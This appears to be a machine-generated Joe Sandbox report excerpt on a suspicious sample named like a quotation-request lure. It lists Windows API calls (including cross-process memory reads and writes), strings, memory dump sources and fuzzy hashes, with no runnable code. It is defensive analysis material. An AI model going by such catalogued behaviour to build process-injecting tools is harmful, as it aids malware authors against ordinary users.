                                              • Instruction ID: 599624334b39fbedb20bd9f6d322ebe40a354b6be3a80f17f0ee3398eae8aa80
                                              • Opcode Fuzzy Hash: 300501f3c34bc67189714a7176891de52c53fdfdf55298683e7e98cdf07053f3
                                              • Instruction Fuzzy Hash: 6211E4322082056ACB1CAA79DCD2AFF7BB99F59300F10003EF719DA1A3EF6599459360
                                              APIs
                                                • Part of subcall function 0014589F: GetLocalTime.KERNEL32 ref: 001458AC
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 001458E1
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 00145913
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 00145946
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 00145988
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00166B6E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalMessageSendTime
                                              • String ID: @U=u$SysDateTimePick32
                                              • API String ID: 2466184910-2530228043
                                              • Opcode ID: 8b9a38ee90449f2d765ba8b56296e8c72e5a42a5b9e76d24a06a4cace541728d
                                              • Instruction ID: 4b1b9997d9eae5f14beaec69677e12fb96e00e5c46f2e26279652efdd8cc30f4
                                              • Opcode Fuzzy Hash: 8b9a38ee90449f2d765ba8b56296e8c72e5a42a5b9e76d24a06a4cace541728d
                                              • Instruction Fuzzy Hash: 63212632340208BFEF219E64DC82FEE736AEB54760F110519F950EB1D1DBB1ACA087A0
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00139720
                                                • Part of subcall function 001418EE: GetWindowThreadProcessId.USER32(?,?), ref: 00141919
                                                • Part of subcall function 001418EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0013973C,00000034,?,?,00001004,00000000,00000000), ref: 00141929
                                                • Part of subcall function 001418EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0013973C,00000034,?,?,00001004,00000000,00000000), ref: 0014193F
                                                • Part of subcall function 001419CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00139778,?,?,00000034,00000800,?,00000034), ref: 001419F6
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00139787
                                                • Part of subcall function 00141997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001397A7,?,?,00000800,?,00001073,00000000,?,?), ref: 001419C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @U=u
                                              • API String ID: 1045663743-2594219639
                                              • Opcode ID: af3b12d21ffcf43a732966afcf08658c89751e86cedda69dcb0c3836c7fb52ce
                                              • Instruction ID: 8cdeaeaddfed57480fb13eb93f5c2c01729c2790cf4e1fa54c00e42e639a6181
                                              • Opcode Fuzzy Hash: af3b12d21ffcf43a732966afcf08658c89751e86cedda69dcb0c3836c7fb52ce
                                              • Instruction Fuzzy Hash: BE214C31901129ABEF11ABA4DC41FDDBBB8FF18350F1001A5F554A71A1DB715A84DFA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001669D0
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001669DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 8aba97e581a12bb4e587f3817d9bd3d16009f79bdfdf49be3692383d4c867a1a
                                              • Instruction ID: 9de7a8fc59c17aeb9391522e0c45384c82154de36ec270422fca03c14463e940
                                              • Opcode Fuzzy Hash: 8aba97e581a12bb4e587f3817d9bd3d16009f79bdfdf49be3692383d4c867a1a
                                              • Instruction Fuzzy Hash: B411B2716042086FEF159E64DC80EFB3B6AEB993A8F110128FD5897291D7759CA187A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @U=u
                                              • API String ID: 0-2594219639
                                              • Opcode ID: 39b748c5d7a6ab81724c0fb13bc8f92986a4dec31c7b45f36d082f4d24d2b8e1
                                              • Instruction ID: 33d4bb8da01ced06aaa23c5ade9a1973826ec539578a1a35e9b0a638b05ecdd3
                                              • Opcode Fuzzy Hash: 39b748c5d7a6ab81724c0fb13bc8f92986a4dec31c7b45f36d082f4d24d2b8e1
                                              • Instruction Fuzzy Hash: 5B219D71204248BFEB148F94CC41FBA37A8EB09355F014159FA22EB1E1C770D961EB60
                                              APIs
                                                • Part of subcall function 000E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000E1D73
                                                • Part of subcall function 000E1D35: GetStockObject.GDI32(00000011), ref: 000E1D87
                                                • Part of subcall function 000E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E1D91
                                              • GetWindowRect.USER32(00000000,?), ref: 00166EE0
                                              • GetSysColor.USER32(00000012), ref: 00166EFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 11f687b22307829cf7277a146f5aac1b15c0338805eb2ceed1a764310ec5a10f
                                              • Instruction ID: 435c4cffed7f3c5258038fcbb26c4a81e608deb4ec89655e88283ad82e575812
                                              • Opcode Fuzzy Hash: 11f687b22307829cf7277a146f5aac1b15c0338805eb2ceed1a764310ec5a10f
                                              • Instruction Fuzzy Hash: B921677261020AAFDB04DFA8DC45AFA7BB8FB08314F004628FD55E3250E775E861DB60
                                              APIs
                                              • _memset.LIBCMT ref: 00142F11
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00142F30
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 8d2c69604dc403fc38fa74c908ca89161ff7b8742f0fe2b20e723a3c32b94267
                                              • Instruction ID: 7062f84441742f06e34ecb6ed15fa8d5478b646125fab1e52d569b0ecb3d8a62
                                              • Opcode Fuzzy Hash: 8d2c69604dc403fc38fa74c908ca89161ff7b8742f0fe2b20e723a3c32b94267
                                              • Instruction Fuzzy Hash: 6911C432901214ABDB24DB98DC44B9977B9EB26310F9900B5F855F72B0DBB0ED88C791
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00152520
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00152549
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 2e150bde48352a3de542ccaf1c141aec7de34e5deadab29e5ef316ecaf7cd20e
                                              • Instruction ID: 9da08d5962470cd309e9a04696ec132258df7a970d26a887bcb4d5d609e4e02f
                                              • Opcode Fuzzy Hash: 2e150bde48352a3de542ccaf1c141aec7de34e5deadab29e5ef316ecaf7cd20e
                                              • Instruction Fuzzy Hash: C111C172500225FADB288F518C98EFBFF68FB06352F10812AF9654A040E3705989D6E0
                                              APIs
                                              • SendMessageW.USER32(?,?,?,?), ref: 0016879F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: 53b0c6dcec5fee942e0fafca3d3bf2d8123ad6e18ac5d8cf90f03fea97b4439a
                                              • Instruction ID: ad567d71cf00e22d3fb91a67d04aa104c164284ddde60bcb67f7f1d1699f0e64
                                              • Opcode Fuzzy Hash: 53b0c6dcec5fee942e0fafca3d3bf2d8123ad6e18ac5d8cf90f03fea97b4439a
                                              • Instruction Fuzzy Hash: 3B21E77A604109EF8B15DF94DC408EA7BB5FB4D340B114258FE15A3360DB31AD61DBA0
                                              APIs
                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 0016689B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u$button
                                              • API String ID: 3850602802-1762282863
                                              • Opcode ID: 20cb5fb52d6f3ec5f600ced97dc3affeca916624c2b1b3d53867b43fb26e7481
                                              • Instruction ID: f782c9999c50f9e5461e44509204e9321c2b98963b089e636b4f8e7f1b836fbd
                                              • Opcode Fuzzy Hash: 20cb5fb52d6f3ec5f600ced97dc3affeca916624c2b1b3d53867b43fb26e7481
                                              • Instruction Fuzzy Hash: 2B110032150209ABDF018FB0DC41FEA376EFF18314F110218FEA0A71A0C772E8A1AB60
                                              APIs
                                              • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00167B47
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: f8a7e6f38db1589475f2daa6597fe692e13b695cc35865bb3dc7160b65832b54
                                              • Instruction ID: f297006d28ff4fe06f05f0985eb0f538dc76166136a51a9f5f7fc4081c2d44ca
                                              • Opcode Fuzzy Hash: f8a7e6f38db1589475f2daa6597fe692e13b695cc35865bb3dc7160b65832b54
                                              • Instruction Fuzzy Hash: 2E11DD70508348AFDB20DF74CCA1AE7BBE8FF06314F10891DE9AA97291DB7169519B60
                                              APIs
                                                • Part of subcall function 0015830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001580C8,?,00000000,?,?), ref: 00158322
                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001580CB
                                              • htons.WSOCK32(00000000,?,00000000), ref: 00158108
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 2496851823-2422070025
                                              • Opcode ID: 17df73d6494a1f8277717f9ec976dca1f14dae949a0a4c29a65a7070d2b5a776
                                              • Instruction ID: cf5814ed4094ae65145cb7cff07a8cde6ea1f5fad46c4101ce799a47d4f66838
                                              • Opcode Fuzzy Hash: 17df73d6494a1f8277717f9ec976dca1f14dae949a0a4c29a65a7070d2b5a776
                                              • Instruction Fuzzy Hash: 2C118E74600205EBDB20AF64DC86BBDB364FF14325F10852AFD21AB292DB72A8198795
                                              APIs
                                                • Part of subcall function 001419CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00139778,?,?,00000034,00000800,?,00000034), ref: 001419F6
                                              • SendMessageW.USER32(?,0000102B,?,00000000), ref: 001399EB
                                              • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00139A10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$MemoryProcessWrite
                                              • String ID: @U=u
                                              • API String ID: 1195347164-2594219639
                                              • Opcode ID: f333419ab03fa33cf8099e3af2b3f8b412f874067bc21c80ed47dd998a48e4a6
                                              • Instruction ID: 79c4530e3a5be7292c504efaa48294a30af3a4f6c815b716a9bf9a9430761509
                                              • Opcode Fuzzy Hash: f333419ab03fa33cf8099e3af2b3f8b412f874067bc21c80ed47dd998a48e4a6
                                              • Instruction Fuzzy Hash: 8C014E72900218EBDB20AF68DC46FFEBB78DB14320F00016AF911A70D1DBB15D94CB60
                                              APIs
                                              • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00139ADD
                                              • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00139B10
                                                • Part of subcall function 00141997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001397A7,?,?,00000800,?,00001073,00000000,?,?), ref: 001419C1
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$MemoryProcessRead_memmove
                                              • String ID: @U=u
                                              • API String ID: 339422723-2594219639
                                              • Opcode ID: 678e23275a437fb5f50f00a852b8b5eb8a8be3f0fdc77deea0b80068f44b58fe
                                              • Instruction ID: 00546a70981c0f53bca5202622702a93735d1a9230191585c4ff1c7bf41b8ea0
                                              • Opcode Fuzzy Hash: 678e23275a437fb5f50f00a852b8b5eb8a8be3f0fdc77deea0b80068f44b58fe
                                              • Instruction Fuzzy Hash: B1016D71901118AFDB50EF60DC81EE977BCFB24350F4080AAFA89A6161DE714E99DF90
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0011BB8A,?,?,?), ref: 0016C8E1
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0016C8C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageProcSend
                                              • String ID: @U=u
                                              • API String ID: 982171247-2594219639
                                              • Opcode ID: 08971e63078573d7a104d335fce8947be524feb655499764841863e3d3cc2d4e
                                              • Instruction ID: 91ff123d7b6bd60e9be15deff028832f0b8351229c73a0ab7f3592ee823c5598
                                              • Opcode Fuzzy Hash: 08971e63078573d7a104d335fce8947be524feb655499764841863e3d3cc2d4e
                                              • Instruction Fuzzy Hash: 9101D831200214AFCB315F14DC44E763BAEFF89324F140128F9661B6E1C7716862EB91
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00139A2E
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00139A46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: b6871e26464920e7ff118b0b1bd9b09a91597845f591de9c9b52ee10606e3ddb
                                              • Instruction ID: 2fd806d5908b6b5c17fcc3c3b9b56e064a42848ec8b0bcf92f83cedb75395379
                                              • Opcode Fuzzy Hash: b6871e26464920e7ff118b0b1bd9b09a91597845f591de9c9b52ee10606e3ddb
                                              • Instruction Fuzzy Hash: 13E09235342361B6F63056259C8EFD77F59DB99B61F120139FB41AA1E1CBD24C8282B0
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013A1BA
                                              • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0013A1EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: e93b495025e80be5b55ce69494f3e639efd5be2cdde003b5770c5fcd807fc634
                                              • Instruction ID: f1ee2e3040ce32c49461b93099b86dbfcad24ef86cf8511dbba2c8d720386d1a
                                              • Opcode Fuzzy Hash: e93b495025e80be5b55ce69494f3e639efd5be2cdde003b5770c5fcd807fc634
                                              • Instruction Fuzzy Hash: 73F0A075244304BFEB166AA0EC86FEA3B1DEF18BA1F010028F7455A0E1DAE25C9097A0
                                              APIs
                                                • Part of subcall function 00139E2E: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00139E47
                                                • Part of subcall function 00139E2E: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00139E81
                                              • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 0013A34B
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0013A35B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: c67886674636b92828d7dbb16ebd11e3297922445049c234e7534e7a078af081
                                              • Instruction ID: d700310a66d99aa988afddb6dce7c5d3031e360854a8381c8f2653312a4415fe
                                              • Opcode Fuzzy Hash: c67886674636b92828d7dbb16ebd11e3297922445049c234e7534e7a078af081
                                              • Instruction Fuzzy Hash: C8E0D8792483057FF6251A61EC8AE97371CEB4C761F120039F300550B0EFE28C906520
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
